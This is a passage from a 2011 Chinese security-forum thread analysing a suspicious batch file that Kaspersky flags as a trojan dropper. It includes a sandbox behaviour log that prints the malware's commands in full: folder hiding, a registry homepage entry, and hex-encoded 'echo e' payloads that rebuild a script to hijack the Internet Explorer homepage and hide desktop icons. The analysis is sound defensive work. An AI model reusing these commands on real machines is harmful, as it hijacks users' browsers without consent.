收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 一个bat,不知道有啥危害
12下一页
返回列表 发新帖
查看: 3753|回复: 12
收起左侧

[可疑文件] 一个bat,不知道有啥危害

[复制链接]
Shirou
发表于 2011-6-14 19:17:30 | 显示全部楼层 |阅读模式
本帖最后由 Shirou 于 2011-6-14 19:18 编辑

上报卡巴入库了,不知道有啥危害

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

z2009
发表于 2011-6-14 19:20:49 | 显示全部楼层
毒霸和kis2012均报安全
回复

举报

Shirou
 楼主| 发表于 2011-6-14 19:23:05 | 显示全部楼层
z2009 发表于 2011-6-14 19:20
毒霸和kis2012均报安全

Trojan-Dropper.BAT.Agent.aq

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.
回复

举报

hddu
发表于 2011-6-14 19:32:23 | 显示全部楼层
2011-06-14 19:24:50    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->?:\*


2011-06-14 19:24:51    运行应用程序      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\attrib.exe
命令行:+s +h "D:\fontpage"
触发规则:所有程序规则->系统程序设置->*\attrib.exe


2011-06-14 19:24:51    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\a.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\f.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\f.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\f.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\f.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\f.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\f.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\f.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\f.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\f.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\f.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\f.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\f.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\f.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\f.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\tmpone.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\tmpone.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\tmpone.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\tmpone.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\tmpone.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\tmpone.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\tmpone.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\tmptwo.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\tmptwo.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\tmptwo.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\tmptwo.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:51    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\tmptwo.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:52    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\tmptwo.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:52    修改文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:D:\fontpage\tmptwo.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:53    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行: /K D:\fontpage\tmpone.bat
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:24:53    删除文件      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:F:\virus\a\Software_ixp.bat
触发规则:应用程序规则->CMD设置->%windir%\system32\cmd.exe->*\*.bat


2011-06-14 19:24:54    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\wscript.exe
命令行: -e:vbs "D:\fontpage\tmpone.bat"  
触发规则:所有程序规则->系统程序设置->%windir%\system32\*script.exe


2011-06-14 19:24:55    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\wscript.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c D:\fontpage\a.bat h
触发规则:所有程序规则->系统程序设置->%windir%\system32\cmd.exe


2011-06-14 19:24:56    运行应用程序      操作:阻止
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\reg.exe
命令行:add "HKCU\Software\VB and VBA Program Settings\newfen" /v "" /d "http://www.860832.COM/" /f
触发规则:所有程序规则->系统程序设置->*\reg.exe


2011-06-14 19:24:58    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\Program Files\Internet Explorer\IEXPLORE.EXE
命令行: http://www.860832.COM/tan.htm
触发规则:所有程序规则->非系统进程操作 ->%ProgramFiles%\Internet Explorer\iexplore.exe


2011-06-14 19:25:02    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 110 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 120 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 130 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 140 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 150 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 160 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 170 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 180 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 190 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo rcx & echo A0 & echo n C:\1.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:25:05    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\ntvdm.exe
命令行:-f -o
触发规则:所有程序规则->系统程序设置->%windir%\system32\ntvdm.exe


2011-06-14 19:25:05    访问物理内存      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
物理内存:\Device\PhysicalMemory
触发规则:应用程序规则->系统程序->%windir%\system32\ntvdm.exe


2011-06-14 19:25:06    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\1.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:25:11    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 110 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 120 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 130 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 140 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 150 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 160 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 170 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 180 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 190 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo rcx & echo A0 & echo n C:\2.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:25:13    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\2.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:25:16    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 110 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 120 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 130 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 140 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 150 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 160 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 170 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 180 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 190 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo rcx & echo A0 & echo n C:\3.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:25:19    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\3.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:25:28    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 110 25 25 61 20 25 25 61 20 25 25 61 20 25 25 61 20 & echo e 120 25 25 61 20 0d 0a 63 6c 73 0d 0a 66 6f 72 20 2f & echo e 130 66 20 22 74 6f 6b 65 6e 73 3d 33 2a 22 20 20 20 & echo e 140 25 25 69 20 20 69 6e 20 28 27 52 45 47 20 51 55 & echo e 150 45 52 59 20 22 48 4b 45 59 5f 43 55 52 52 45 4e & echo e 160 54 5f 55 53 45 52 5c 53 6f 66 74 77 61 72 65 5c & echo e 170 56 42 20 61 6e 64 20 56 42 41 20 50 72 6f 67 72 & echo e 180 61 6d 20 53 65 74 74 69 6e 67 73 5c 6e 65 77 66 & echo e 190 65 6e 22 20 20 20 2f 76 20 22 22 27 29 20 64 6f & echo rcx & echo A0 & echo n C:\4.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:25:28    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\4.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:25:30    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 20 73 65 74 20 73 74 72 55 52 4c 3d 25 25 69 20 & echo e 110 25 25 6a 0d 0a 73 65 74 20 73 74 72 55 52 4c 3d & echo e 120 25 73 74 72 55 52 4c 3a 20 3d 25 0d 0a 73 65 74 & echo e 130 20 73 70 3d 44 3a 5c 66 6f 6e 74 70 61 67 65 0d & echo e 140 0a 73 65 74 20 73 70 3d 25 73 70 3a 20 3d 25 0d & echo e 150 0a 69 66 20 65 78 69 73 74 20 22 25 73 70 25 5c & echo e 160 68 6f 6d 65 70 61 67 65 2e 69 6e 66 22 20 64 65 & echo e 170 6c 20 22 25 73 70 25 5c 68 6f 6d 65 70 61 67 65 & echo e 180 2e 69 6e 66 22 0d 0a 69 66 20 65 78 69 73 74 20 & echo e 190 22 25 73 70 25 5c 69 65 75 69 6e 69 74 2e 69 6e & echo rcx & echo A0 & echo n C:\5.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:25:31    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\5.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:25:40    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 66 22 20 64 65 6c 20 22 25 73 70 25 5c 69 65 75 & echo e 110 69 6e 69 74 2e 69 6e 66 22 0d 0a 65 63 68 6f 20 & echo e 120 5b 56 65 72 73 69 6f 6e 5d 3e 3e 22 25 73 70 25 & echo e 130 5c 68 6f 6d 65 70 61 67 65 2e 69 6e 66 22 0d 0a & echo e 140 65 63 68 6f 20 53 69 67 6e 61 74 75 72 65 3d 22 & echo e 150 24 43 48 49 43 41 47 4f 24 22 3e 3e 22 25 73 70 & echo e 160 25 5c 68 6f 6d 65 70 61 67 65 2e 69 6e 66 22 0d & echo e 170 0a 65 63 68 6f 20 41 64 76 61 6e 63 65 64 49 4e & echo e 180 46 3d 32 2e 35 3e 3e 22 25 73 70 25 5c 68 6f 6d & echo e 190 65 70 61 67 65 2e 69 6e 66 22 0d 0a 65 63 68 6f & echo rcx & echo A0 & echo n C:\6.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:25:40    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\6.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:25:43    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 20 5b 44 65 66 61 75 6c 74 49 6e 73 74 61 6c 6c & echo e 110 5d 3e 3e 22 25 73 70 25 5c 68 6f 6d 65 70 61 67 & echo e 120 65 2e 69 6e 66 22 0d 0a 65 63 68 6f 20 41 64 64 & echo e 130 52 65 67 3d 52 65 67 55 70 64 61 74 65 48 65 6c & echo e 140 70 3e 3e 22 25 73 70 25 5c 68 6f 6d 65 70 61 67 & echo e 150 65 2e 69 6e 66 22 0d 0a 65 63 68 6f 20 5b 52 65 & echo e 160 67 55 70 64 61 74 65 48 65 6c 70 5d 3e 3e 22 25 & echo e 170 73 70 25 5c 68 6f 6d 65 70 61 67 65 2e 69 6e 66 & echo e 180 22 0d 0a 65 63 68 6f 20 48 4b 43 55 2c 22 53 6f & echo e 190 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 & echo rcx & echo A0 & echo n C:\7.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:25:44    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\7.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:25:45    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 & echo e 110 56 65 72 73 69 6f 6e 5c 45 78 70 6c 6f 72 65 72 & echo e 120 5c 48 69 64 65 44 65 73 6b 74 6f 70 49 63 6f 6e & echo e 130 73 5c 43 6c 61 73 73 69 63 53 74 61 72 74 4d 65 & echo e 140 6e 75 22 2c 22 7b 38 37 31 43 35 33 38 30 2d 34 & echo e 150 32 41 30 2d 31 30 36 39 2d 41 32 45 41 2d 30 38 & echo e 160 30 30 32 42 33 30 33 30 39 44 7d 22 2c 2c 22 31 & echo e 170 22 3e 3e 22 25 73 70 25 5c 68 6f 6d 65 70 61 67 & echo e 180 65 2e 69 6e 66 22 0d 0a 65 63 68 6f 20 48 4b 43 & echo e 190 55 2c 22 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 & echo rcx & echo A0 & echo n C:\8.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:25:46    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\8.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:25:48    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 & echo e 110 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 45 78 70 & echo e 120 6c 6f 72 65 72 5c 48 69 64 65 44 65 73 6b 74 6f & echo e 130 70 49 63 6f 6e 73 5c 4e 65 77 53 74 61 72 74 50 & echo e 140 61 6e 65 6c 22 2c 22 7b 38 37 31 43 35 33 38 30 & echo e 150 2d 34 32 41 30 2d 31 30 36 39 2d 41 32 45 41 2d & echo e 160 30 38 30 30 32 42 33 30 33 30 39 44 7d 22 2c 2c & echo e 170 22 31 22 3e 3e 22 25 73 70 25 5c 68 6f 6d 65 70 & echo e 180 61 67 65 2e 69 6e 66 22 0d 0a 65 63 68 6f 20 48 & echo e 190 4b 43 52 2c 22 43 4c 53 49 44 5c 7b 32 35 35 39 & echo rcx & echo A0 & echo n C:\9.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:25:49    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\9.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:25:52    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 61 31 66 37 2d 32 31 64 37 2d 31 31 64 34 2d 62 & echo e 110 64 61 66 2d 30 30 63 30 34 66 36 30 62 39 62 62 & echo e 120 7d 22 2c 22 22 2c 2c 22 53 65 74 20 50 72 6f 67 & echo e 130 72 61 6d 20 41 63 63 65 73 73 20 61 6e 64 20 44 & echo e 140 65 66 61 75 6c 74 73 22 3e 3e 22 25 73 70 25 5c & echo e 150 68 6f 6d 65 70 61 67 65 2e 69 6e 66 22 0d 0a 65 & echo e 160 63 68 6f 20 48 4b 43 52 2c 22 43 4c 53 49 44 5c & echo e 170 7b 32 35 35 39 61 31 66 37 2d 32 31 64 37 2d 31 & echo e 180 31 64 34 2d 62 64 61 66 2d 30 30 63 30 34 66 36 & echo e 190 30 62 39 62 62 7d 22 2c 22 4c 6f 63 61 6c 69 7a & echo rcx & echo A0 & echo n C:\10.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:25:52    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\10.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:25:54    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 65 64 53 74 72 69 6e 67 22 2c 2c 22 40 73 68 64 & echo e 110 6f 63 6c 63 2e 64 6c 6c 2c 2d 38 38 30 22 3e 3e & echo e 120 22 25 73 70 25 5c 68 6f 6d 65 70 61 67 65 2e 69 & echo e 130 6e 66 22 0d 0a 65 63 68 6f 20 48 4b 43 52 2c 22 & echo e 140 43 4c 53 49 44 5c 7b 32 35 35 39 61 31 66 37 2d & echo e 150 32 31 64 37 2d 31 31 64 34 2d 62 64 61 66 2d 30 & echo e 160 30 63 30 34 66 36 30 62 39 62 62 7d 22 2c 22 49 & echo e 170 6e 66 6f 54 69 70 22 2c 2c 22 40 73 68 64 6f 63 & echo e 180 6c 63 2e 64 6c 6c 2c 2d 38 38 30 22 3e 3e 22 25 & echo e 190 73 70 25 5c 68 6f 6d 65 70 61 67 65 2e 69 6e 66 & echo rcx & echo A0 & echo n C:\11.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:25:55    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\11.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:25:57    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 22 0d 0a 65 63 68 6f 20 48 4b 43 52 2c 22 43 4c & echo e 110 53 49 44 5c 7b 32 35 35 39 61 31 66 37 2d 32 31 & echo e 120 64 37 2d 31 31 64 34 2d 62 64 61 66 2d 30 30 63 & echo e 130 30 34 66 36 30 62 39 62 62 7d 5c 44 65 66 61 75 & echo e 140 6c 74 49 63 6f 6e 22 2c 22 22 2c 2c 22 25 50 72 & echo e 150 6f 67 72 61 6d 46 69 6c 65 73 25 5c 49 6e 74 65 & echo e 160 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 5c 49 45 & echo e 170 58 50 4c 4f 52 45 2e 45 58 45 22 3e 3e 22 25 73 & echo e 180 70 25 5c 68 6f 6d 65 70 61 67 65 2e 69 6e 66 22 & echo e 190 0d 0a 65 63 68 6f 20 48 4b 43 52 2c 22 43 4c 53 & echo rcx & echo A0 & echo n C:\12.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:25:58    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\12.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:26:06    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 49 44 5c 7b 32 35 35 39 61 31 66 37 2d 32 31 64 & echo e 110 37 2d 31 31 64 34 2d 62 64 61 66 2d 30 30 63 30 & echo e 120 34 66 36 30 62 39 62 62 7d 5c 49 6e 50 72 6f 63 & echo e 130 53 65 72 76 65 72 33 32 22 2c 22 22 2c 2c 22 25 & echo e 140 53 79 73 74 65 6d 52 6f 6f 74 25 5c 73 79 73 74 & echo e 150 65 6d 33 32 5c 73 68 64 6f 63 76 77 2e 64 6c 6c & echo e 160 22 3e 3e 22 25 73 70 25 5c 68 6f 6d 65 70 61 67 & echo e 170 65 2e 69 6e 66 22 0d 0a 65 63 68 6f 20 48 4b 43 & echo e 180 52 2c 22 43 4c 53 49 44 5c 7b 32 35 35 39 61 31 & echo e 190 66 37 2d 32 31 64 37 2d 31 31 64 34 2d 62 64 61 & echo rcx & echo A0 & echo n C:\13.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:26:07    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\13.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:26:09    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/S /D /c" ( echo e 100 66 2d 30 30 63 30 34 66 36 30 62 39 62 62 7d 5c & echo e 110 49 6e 50 72 6f 63 53 65 72 76 65 72 33 32 22 2c & echo e 120 22 54 68 72 65 61 64 69 6e 67 4d 6f 64 65 6c 22 & echo e 130 2c 2c 22 41 70 61 72 74 6d 65 6e 74 22 3e 3e 22 & echo e 140 25 73 70 25 5c 68 6f 6d 65 70 61 67 65 2e 69 6e & echo e 150 66 22 0d 0a 65 63 68 6f 20 48 4b 43 52 2c 22 43 & echo e 160 4c 53 49 44 5c 7b 32 35 35 39 61 31 66 37 2d 32 & echo e 170 31 64 37 2d 31 31 64 34 2d 62 64 61 66 2d 30 30 & echo e 180 63 30 34 66 36 30 62 39 62 62 7d 5c 49 6e 73 74 & echo e 190 61 6e 63 65 22 2c 22 43 4c 53 49 44 22 2c 2c 22 & echo rcx & echo A0 & echo n C:\14.dll & echo w & echo q )"
触发规则:应用程序规则->系统程序->%windir%\system32\cmd.exe->%windir%\system32\cmd.exe


2011-06-14 19:26:10    创建文件      操作:允许
进程路径:C:\WINDOWS\system32\ntvdm.exe
文件路径:C:\14.DLL
触发规则:应用程序规则->WINDOWS文件设置->%windir%\*.exe->?:\*


2011-06-14 19:26:12    运行应用程序      操作:允许
进程路径:C:\WINDOWS\system32\cmd.exe
文件路径:C:\WINDOWS\system32\cmd.exe
